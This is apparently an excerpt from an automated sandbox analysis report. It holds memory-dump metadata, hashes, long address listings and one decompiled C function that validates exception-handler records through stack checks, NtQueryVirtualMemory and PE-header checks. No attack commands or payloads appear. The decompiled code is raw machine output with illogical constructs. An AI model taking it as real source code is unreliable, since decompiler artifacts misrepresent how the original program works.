                                                                                                                                                                                                                                          0x01125c6e
                                                                                                                                                                                                                                          0x01125c71
                                                                                                                                                                                                                                          0x01125c89
                                                                                                                                                                                                                                          0x01125c8c
                                                                                                                                                                                                                                          0x01125ca2
                                                                                                                                                                                                                                          0x01125ca5
                                                                                                                                                                                                                                          0x01125cbd
                                                                                                                                                                                                                                          0x01125cc0
                                                                                                                                                                                                                                          0x01125cd8
                                                                                                                                                                                                                                          0x01125cdb
                                                                                                                                                                                                                                          0x01125ced
                                                                                                                                                                                                                                          0x01125cf0
                                                                                                                                                                                                                                          0x01125d02
                                                                                                                                                                                                                                          0x01125d05
                                                                                                                                                                                                                                          0x01125d17
                                                                                                                                                                                                                                          0x01125d1a
                                                                                                                                                                                                                                          0x01125d1e
                                                                                                                                                                                                                                          0x01125d2e
                                                                                                                                                                                                                                          0x01125d31
                                                                                                                                                                                                                                          0x01125d3f
                                                                                                                                                                                                                                          0x01125d42
                                                                                                                                                                                                                                          0x01125d54
                                                                                                                                                                                                                                          0x01125d57
                                                                                                                                                                                                                                          0x01125d6b
                                                                                                                                                                                                                                          0x01125d6e
                                                                                                                                                                                                                                          0x01125d70
                                                                                                                                                                                                                                          0x01125d80
                                                                                                                                                                                                                                          0x01125d83
                                                                                                                                                                                                                                          0x01125d95
                                                                                                                                                                                                                                          0x01125d98
                                                                                                                                                                                                                                          0x01125da6
                                                                                                                                                                                                                                          0x01125da9
                                                                                                                                                                                                                                          0x01125dbb
                                                                                                                                                                                                                                          0x01125dbe
                                                                                                                                                                                                                                          0x01125dc2
                                                                                                                                                                                                                                          0x01125dd2
                                                                                                                                                                                                                                          0x01125dd5
                                                                                                                                                                                                                                          0x01125de7
                                                                                                                                                                                                                                          0x01125dea
                                                                                                                                                                                                                                          0x01125df8
                                                                                                                                                                                                                                          0x01125dfb
                                                                                                                                                                                                                                          0x01125e0d
                                                                                                                                                                                                                                          0x01125e10
                                                                                                                                                                                                                                          0x01125e22
                                                                                                                                                                                                                                          0x01125e25
                                                                                                                                                                                                                                          0x01125e39
                                                                                                                                                                                                                                          0x01125e3c
                                                                                                                                                                                                                                          0x01125e50
                                                                                                                                                                                                                                          0x01125e53
                                                                                                                                                                                                                                          0x01125e67
                                                                                                                                                                                                                                          0x01125e6a
                                                                                                                                                                                                                                          0x01125e7e
                                                                                                                                                                                                                                          0x01125e81
                                                                                                                                                                                                                                          0x01125e95
                                                                                                                                                                                                                                          0x01125e98
                                                                                                                                                                                                                                          0x01125eac
                                                                                                                                                                                                                                          0x01125eb1
                                                                                                                                                                                                                                          0x01125ec3
                                                                                                                                                                                                                                          0x01125ec6
                                                                                                                                                                                                                                          0x01125eda
                                                                                                                                                                                                                                          0x01125edd
                                                                                                                                                                                                                                          0x01125ef1
                                                                                                                                                                                                                                          0x01125ef4
                                                                                                                                                                                                                                          0x01125f0a
                                                                                                                                                                                                                                          0x01125f0d
                                                                                                                                                                                                                                          0x01125f21
                                                                                                                                                                                                                                          0x01125f24
                                                                                                                                                                                                                                          0x01125f36
                                                                                                                                                                                                                                          0x01125f39
                                                                                                                                                                                                                                          0x01125f4d
                                                                                                                                                                                                                                          0x01125f50
                                                                                                                                                                                                                                          0x01125f64
                                                                                                                                                                                                                                          0x01125f67
                                                                                                                                                                                                                                          0x01125f7b
                                                                                                                                                                                                                                          0x01125f84
                                                                                                                                                                                                                                          0x01125f87
                                                                                                                                                                                                                                          0x01125f90
                                                                                                                                                                                                                                          0x01125f99
                                                                                                                                                                                                                                          0x01125fa1
                                                                                                                                                                                                                                          0x01125fa9
                                                                                                                                                                                                                                          0x01125fb3
                                                                                                                                                                                                                                          0x01125fc8

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                                                          • Opcode ID: 4017203efa24db58f9d54351c93f765915507c990ab3cf859a8473f221a58c33
                                                                                                                                                                                                                                          • Instruction ID: 90c8000cf19102357207446d8dba57c8d6b6083916a58b6c24d1ba5a2f98aa3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4017203efa24db58f9d54351c93f765915507c990ab3cf859a8473f221a58c33
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F022857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E0112B2FD(long _a4) {
                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                          				short* _v32;
                                                                                                                                                                                                                                          				void _v36;
                                                                                                                                                                                                                                          				void* _t57;
                                                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                                                          				signed int _t62;
                                                                                                                                                                                                                                          				void* _t63;
                                                                                                                                                                                                                                          				signed int* _t68;
                                                                                                                                                                                                                                          				intOrPtr* _t69;
                                                                                                                                                                                                                                          				intOrPtr* _t71;
                                                                                                                                                                                                                                          				intOrPtr _t72;
                                                                                                                                                                                                                                          				intOrPtr _t75;
                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                          				signed int _t77;
                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                          				void _t80;
                                                                                                                                                                                                                                          				signed int _t81;
                                                                                                                                                                                                                                          				signed int _t84;
                                                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                                                          				short* _t87;
                                                                                                                                                                                                                                          				void* _t89;
                                                                                                                                                                                                                                          				signed int* _t90;
                                                                                                                                                                                                                                          				long _t91;
                                                                                                                                                                                                                                          				signed int _t93;
                                                                                                                                                                                                                                          				signed int _t94;
                                                                                                                                                                                                                                          				signed int _t100;
                                                                                                                                                                                                                                          				signed int _t102;
                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                          				long _t108;
                                                                                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t108 = _a4;
                                                                                                                                                                                                                                          				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                          				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                          				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                          				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                          					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                          					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                          					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                          						_t91 = 0;
                                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                                          						_a4 = 0;
                                                                                                                                                                                                                                          						_t57 = _t76;
                                                                                                                                                                                                                                          						do {
                                                                                                                                                                                                                                          							_t80 =  *_t57;
                                                                                                                                                                                                                                          							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                          							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                          							if(_t80 >= _t91) {
                                                                                                                                                                                                                                          								L20:
                                                                                                                                                                                                                                          								_t63 = 0;
                                                                                                                                                                                                                                          								L60:
                                                                                                                                                                                                                                          								return _t63;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                                                          							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                          							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                          								_t12 =  &_a4;
                                                                                                                                                                                                                                          								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                          								__eflags =  *_t12;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							_t91 = _t91 + 1;
                                                                                                                                                                                                                                          							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                          							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                          						} while (_t91 <= _t102);
                                                                                                                                                                                                                                          						__eflags = _a4;
                                                                                                                                                                                                                                          						if(_a4 == 0) {
                                                                                                                                                                                                                                          							L15:
                                                                                                                                                                                                                                          							_t81 =  *0x112d2d8; // 0x0
                                                                                                                                                                                                                                          							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                          							_t58 = 0;
                                                                                                                                                                                                                                          							__eflags = _t81;
                                                                                                                                                                                                                                          							if(_t81 <= 0) {
                                                                                                                                                                                                                                          								L18:
                                                                                                                                                                                                                                          								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                          								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                          								__eflags = _t61;
                                                                                                                                                                                                                                          								if(_t61 < 0) {
                                                                                                                                                                                                                                          									_t62 = 0;
                                                                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									_t62 = _a4;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								__eflags = _t62;
                                                                                                                                                                                                                                          								if(_t62 == 0) {
                                                                                                                                                                                                                                          									L59:
                                                                                                                                                                                                                                          									_t63 = _t104;
                                                                                                                                                                                                                                          									goto L60;
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                                          									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                                          									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                                          										L46:
                                                                                                                                                                                                                                          										_t63 = 1;
                                                                                                                                                                                                                                          										 *0x112d320 = 1;
                                                                                                                                                                                                                                          										__eflags =  *0x112d320;
                                                                                                                                                                                                                                          										if( *0x112d320 != 0) {
                                                                                                                                                                                                                                          											goto L60;
                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                          										_t84 =  *0x112d2d8; // 0x0
                                                                                                                                                                                                                                          										__eflags = _t84;
                                                                                                                                                                                                                                          										_t93 = _t84;
                                                                                                                                                                                                                                          										if(_t84 <= 0) {
                                                                                                                                                                                                                                          											L51:
                                                                                                                                                                                                                                          											__eflags = _t93;
                                                                                                                                                                                                                                          											if(_t93 != 0) {
                                                                                                                                                                                                                                          												L58:
                                                                                                                                                                                                                                          												 *0x112d320 = 0;
                                                                                                                                                                                                                                          												goto L5;
                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                          											_t77 = 0xf;
                                                                                                                                                                                                                                          											__eflags = _t84 - _t77;
                                                                                                                                                                                                                                          											if(_t84 <= _t77) {
                                                                                                                                                                                                                                          												_t77 = _t84;
                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                          											_t94 = 0;
                                                                                                                                                                                                                                          											__eflags = _t77;
                                                                                                                                                                                                                                          											if(_t77 < 0) {
                                                                                                                                                                                                                                          												L56:
                                                                                                                                                                                                                                          												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                          												if(_t84 < 0x10) {
                                                                                                                                                                                                                                          													_t86 = _t84 + 1;
                                                                                                                                                                                                                                          													__eflags = _t86;
                                                                                                                                                                                                                                          													 *0x112d2d8 = _t86;
                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                          												goto L58;
                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                          												do {
                                                                                                                                                                                                                                          													_t68 = 0x112d2e0 + _t94 * 4;
                                                                                                                                                                                                                                          													_t94 = _t94 + 1;
                                                                                                                                                                                                                                          													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                          													 *_t68 = _t110;
                                                                                                                                                                                                                                          													_t110 =  *_t68;
                                                                                                                                                                                                                                          												} while (_t94 <= _t77);
                                                                                                                                                                                                                                          												goto L56;
                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                          										_t69 = 0x112d2dc + _t84 * 4;
                                                                                                                                                                                                                                          										while(1) {
                                                                                                                                                                                                                                          											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                                          											if( *_t69 == _t110) {
                                                                                                                                                                                                                                          												goto L51;
                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                          											_t93 = _t93 - 1;
                                                                                                                                                                                                                                          											_t69 = _t69 - 4;
                                                                                                                                                                                                                                          											__eflags = _t93;
                                                                                                                                                                                                                                          											if(_t93 > 0) {
                                                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                          											goto L51;
                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                          										goto L51;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									_t87 = _v32;
                                                                                                                                                                                                                                          									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                                          									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                                          									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                                          									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                                          									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									_t78 = _t76 - _t87;
                                                                                                                                                                                                                                          									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                                          									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                                          									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                                          									__eflags = _t78 - _t72;
                                                                                                                                                                                                                                          									if(_t78 < _t72) {
                                                                                                                                                                                                                                          										goto L46;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                                          									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                                          										goto L46;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                                          									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                                          										goto L20;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									goto L46;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								goto L16;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                          								L16:
                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(0x112d2e0 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                          								if( *((intOrPtr*)(0x112d2e0 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								_t58 = _t58 + 1;
                                                                                                                                                                                                                                          								__eflags = _t58 - _t81;
                                                                                                                                                                                                                                          								if(_t58 < _t81) {
                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								goto L18;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							__eflags = _t58;
                                                                                                                                                                                                                                          							if(_t58 <= 0) {
                                                                                                                                                                                                                                          								goto L5;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							 *0x112d320 = 1;
                                                                                                                                                                                                                                          							__eflags =  *0x112d320;
                                                                                                                                                                                                                                          							if( *0x112d320 != 0) {
                                                                                                                                                                                                                                          								goto L5;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							__eflags =  *((intOrPtr*)(0x112d2e0 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                          							if( *((intOrPtr*)(0x112d2e0 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                          								L32:
                                                                                                                                                                                                                                          								_t100 = 0;
                                                                                                                                                                                                                                          								__eflags = _t58;
                                                                                                                                                                                                                                          								if(_t58 < 0) {
                                                                                                                                                                                                                                          									L34:
                                                                                                                                                                                                                                          									 *0x112d320 = 0;
                                                                                                                                                                                                                                          									goto L5;
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									goto L33;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								do {
                                                                                                                                                                                                                                          									L33:
                                                                                                                                                                                                                                          									_t90 = 0x112d2e0 + _t100 * 4;
                                                                                                                                                                                                                                          									_t100 = _t100 + 1;
                                                                                                                                                                                                                                          									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                          									 *_t90 = _t110;
                                                                                                                                                                                                                                          									_t110 =  *_t90;
                                                                                                                                                                                                                                          								} while (_t100 <= _t58);
                                                                                                                                                                                                                                          								goto L34;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							_t25 = _t81 - 1; // -1
                                                                                                                                                                                                                                          							_t58 = _t25;
                                                                                                                                                                                                                                          							__eflags = _t58;
                                                                                                                                                                                                                                          							if(_t58 < 0) {
                                                                                                                                                                                                                                          								L28:
                                                                                                                                                                                                                                          								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                          								if(_t81 < 0x10) {
                                                                                                                                                                                                                                          									_t81 = _t81 + 1;
                                                                                                                                                                                                                                          									__eflags = _t81;
                                                                                                                                                                                                                                          									 *0x112d2d8 = _t81;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								_t28 = _t81 - 1; // 0x0
                                                                                                                                                                                                                                          								_t58 = _t28;
                                                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								goto L25;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                          								L25:
                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(0x112d2e0 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                          								if( *((intOrPtr*)(0x112d2e0 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								_t58 = _t58 - 1;
                                                                                                                                                                                                                                          								__eflags = _t58;
                                                                                                                                                                                                                                          								if(_t58 >= 0) {
                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							__eflags = _t58;
                                                                                                                                                                                                                                          							if(__eflags >= 0) {
                                                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                                                          									goto L34;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							goto L28;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                          						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                          						if(_t75 < _v8) {
                                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                          						if(_t75 >= _t108) {
                                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                          					_t63 = 1;
                                                                                                                                                                                                                                          					goto L60;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          			}




































                                                                                                                                                                                                                                          0x0112b307
                                                                                                                                                                                                                                          0x0112b30a
                                                                                                                                                                                                                                          0x0112b310
                                                                                                                                                                                                                                          0x0112b32e
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b32e
                                                                                                                                                                                                                                          0x0112b318
                                                                                                                                                                                                                                          0x0112b321
                                                                                                                                                                                                                                          0x0112b327
                                                                                                                                                                                                                                          0x0112b336
                                                                                                                                                                                                                                          0x0112b339
                                                                                                                                                                                                                                          0x0112b33c
                                                                                                                                                                                                                                          0x0112b346
                                                                                                                                                                                                                                          0x0112b346
                                                                                                                                                                                                                                          0x0112b348
                                                                                                                                                                                                                                          0x0112b34b
                                                                                                                                                                                                                                          0x0112b34d
                                                                                                                                                                                                                                          0x0112b34d
                                                                                                                                                                                                                                          0x0112b34f
                                                                                                                                                                                                                                          0x0112b352
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b354
                                                                                                                                                                                                                                          0x0112b356
                                                                                                                                                                                                                                          0x0112b3bc
                                                                                                                                                                                                                                          0x0112b3bc
                                                                                                                                                                                                                                          0x0112b51a
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b51a
                                                                                                                                                                                                                                          0x0112b358
                                                                                                                                                                                                                                          0x0112b358
                                                                                                                                                                                                                                          0x0112b35c
                                                                                                                                                                                                                                          0x0112b35e
                                                                                                                                                                                                                                          0x0112b35e
                                                                                                                                                                                                                                          0x0112b35e
                                                                                                                                                                                                                                          0x0112b35e
                                                                                                                                                                                                                                          0x0112b361
                                                                                                                                                                                                                                          0x0112b362
                                                                                                                                                                                                                                          0x0112b365
                                                                                                                                                                                                                                          0x0112b365
                                                                                                                                                                                                                                          0x0112b369
                                                                                                                                                                                                                                          0x0112b36d
                                                                                                                                                                                                                                          0x0112b37b
                                                                                                                                                                                                                                          0x0112b37b
                                                                                                                                                                                                                                          0x0112b383
                                                                                                                                                                                                                                          0x0112b389
                                                                                                                                                                                                                                          0x0112b38b
                                                                                                                                                                                                                                          0x0112b38d
                                                                                                                                                                                                                                          0x0112b39d
                                                                                                                                                                                                                                          0x0112b3aa
                                                                                                                                                                                                                                          0x0112b3ae
                                                                                                                                                                                                                                          0x0112b3b3
                                                                                                                                                                                                                                          0x0112b3b5
                                                                                                                                                                                                                                          0x0112b433
                                                                                                                                                                                                                                          0x0112b433
                                                                                                                                                                                                                                          0x0112b3b7
                                                                                                                                                                                                                                          0x0112b3b7
                                                                                                                                                                                                                                          0x0112b3b7
                                                                                                                                                                                                                                          0x0112b435
                                                                                                                                                                                                                                          0x0112b437
                                                                                                                                                                                                                                          0x0112b518
                                                                                                                                                                                                                                          0x0112b518
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b43d
                                                                                                                                                                                                                                          0x0112b43d
                                                                                                                                                                                                                                          0x0112b444
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b44a
                                                                                                                                                                                                                                          0x0112b44e
                                                                                                                                                                                                                                          0x0112b4aa
                                                                                                                                                                                                                                          0x0112b4ac
                                                                                                                                                                                                                                          0x0112b4b4
                                                                                                                                                                                                                                          0x0112b4b6
                                                                                                                                                                                                                                          0x0112b4b8
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b4ba
                                                                                                                                                                                                                                          0x0112b4c0
                                                                                                                                                                                                                                          0x0112b4c2
                                                                                                                                                                                                                                          0x0112b4c4
                                                                                                                                                                                                                                          0x0112b4d9
                                                                                                                                                                                                                                          0x0112b4d9
                                                                                                                                                                                                                                          0x0112b4db
                                                                                                                                                                                                                                          0x0112b50a
                                                                                                                                                                                                                                          0x0112b511
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b511
                                                                                                                                                                                                                                          0x0112b4df
                                                                                                                                                                                                                                          0x0112b4e0
                                                                                                                                                                                                                                          0x0112b4e2
                                                                                                                                                                                                                                          0x0112b4e4
                                                                                                                                                                                                                                          0x0112b4e4
                                                                                                                                                                                                                                          0x0112b4e6
                                                                                                                                                                                                                                          0x0112b4e8
                                                                                                                                                                                                                                          0x0112b4ea
                                                                                                                                                                                                                                          0x0112b4fe
                                                                                                                                                                                                                                          0x0112b4fe
                                                                                                                                                                                                                                          0x0112b501
                                                                                                                                                                                                                                          0x0112b503
                                                                                                                                                                                                                                          0x0112b503
                                                                                                                                                                                                                                          0x0112b504
                                                                                                                                                                                                                                          0x0112b504
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b4ec
                                                                                                                                                                                                                                          0x0112b4ec
                                                                                                                                                                                                                                          0x0112b4ec
                                                                                                                                                                                                                                          0x0112b4f5
                                                                                                                                                                                                                                          0x0112b4f6
                                                                                                                                                                                                                                          0x0112b4f8
                                                                                                                                                                                                                                          0x0112b4fa
                                                                                                                                                                                                                                          0x0112b4fa
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b4ec
                                                                                                                                                                                                                                          0x0112b4ea
                                                                                                                                                                                                                                          0x0112b4c6
                                                                                                                                                                                                                                          0x0112b4cd
                                                                                                                                                                                                                                          0x0112b4cd
                                                                                                                                                                                                                                          0x0112b4cf
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b4d1
                                                                                                                                                                                                                                          0x0112b4d2
                                                                                                                                                                                                                                          0x0112b4d5
                                                                                                                                                                                                                                          0x0112b4d7
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b4d7
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b4cd
                                                                                                                                                                                                                                          0x0112b450
                                                                                                                                                                                                                                          0x0112b453
                                                                                                                                                                                                                                          0x0112b458
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b461
                                                                                                                                                                                                                                          0x0112b463
                                                                                                                                                                                                                                          0x0112b469
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b46f
                                                                                                                                                                                                                                          0x0112b475
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b47b
                                                                                                                                                                                                                                          0x0112b47d
                                                                                                                                                                                                                                          0x0112b486
                                                                                                                                                                                                                                          0x0112b48a
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b490
                                                                                                                                                                                                                                          0x0112b493
                                                                                                                                                                                                                                          0x0112b495
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b49c
                                                                                                                                                                                                                                          0x0112b49e
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b4a0
                                                                                                                                                                                                                                          0x0112b4a4
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b4a4
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b38f
                                                                                                                                                                                                                                          0x0112b38f
                                                                                                                                                                                                                                          0x0112b38f
                                                                                                                                                                                                                                          0x0112b396
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b398
                                                                                                                                                                                                                                          0x0112b399
                                                                                                                                                                                                                                          0x0112b39b
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b39b
                                                                                                                                                                                                                                          0x0112b3c3
                                                                                                                                                                                                                                          0x0112b3c5
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b3d5
                                                                                                                                                                                                                                          0x0112b3d7
                                                                                                                                                                                                                                          0x0112b3d9
